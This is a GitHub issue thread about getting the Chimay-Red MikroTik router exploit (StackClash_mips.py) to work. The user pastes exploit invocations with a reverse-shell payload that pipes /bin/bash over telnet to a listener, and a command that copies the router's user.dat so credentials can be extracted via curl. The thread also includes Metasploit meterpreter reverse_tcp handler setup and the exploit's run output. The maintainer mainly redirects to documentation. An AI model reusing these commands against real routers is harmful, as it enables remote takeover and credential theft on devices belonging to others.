Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

shellcommand #28

Open
halekan opened this issue Mar 6, 2018 · 8 comments
Open

shellcommand #28

halekan opened this issue Mar 6, 2018 · 8 comments

Comments

@halekan
Copy link

halekan commented Mar 6, 2018

what shellcommand how build it by KALI LINUX to make it works fine
/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"
Usage: ./StackClash_mips.py IP PORT binary shellcommand

How to get a reverse shell?

  1. First, prepare metasploit multi handler on your computer

use exploit/multi/handler
set payload linux/mipsbe/meterpreter/reverse_tcp
set LHOST YOUR IP
set LPORT YOUR LPORT
run

where payload to send it to mikrotik and how build it msfvenom we have only binary ???????

can explain
@BigNerd95
Copy link
Owner

What is this?
/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Pseudo random command?

Please read the readme.md before opening issues
https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#reverse-shell

@halekan
Copy link
Author

halekan commented Mar 7, 2018
edited
Loading

good

Read it full
tes on RB750GL / MIPSBE / v6.37.1

$ nc -l -p 1234

root@test:~/Chimay# ./StackClash_mips.py 192.168.230.113 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.233.190 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

root@test:~/Chimay# ./StackClash_mips.py 192.168.233.190 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"

Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

Extract users not thing happen

root@test:~/Chimay# curl -s http://192.168.233.190/winbox/index | ./tools/extract_user.py -

root@test:~/Chimay# ............................. it is blank no result no user no password .......................................

@BigNerd95
Copy link
Owner

Does reverse shell work?
When you run "extract user" do you close reverse shell before running the exploit?

@halekan
Copy link
Author

halekan commented Mar 7, 2018

$ nc -l -p 1234
no

@BigNerd95
Copy link
Owner

So you have to root your board and debug it
Sorry but I cant test all versions for anyone
If you are able to fix it then send a PR

@halekan
Copy link
Author

halekan commented Mar 7, 2018

how root it Give Me Steps one by one

@BigNerd95
Copy link
Owner

Also a coffee?

Some links

https://github.com/0ki/mikrotik-tools/tree/master/exploit-backup

https://www.dropbox.com/s/3fey2nmmu993xz1/Rooting%20Mikro%20Tik%20routers.pdf?dl=0

Then read my pdf to install gdb-server

@BigNerd95
Copy link
Owner

Nope

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@BigNerd95 @halekan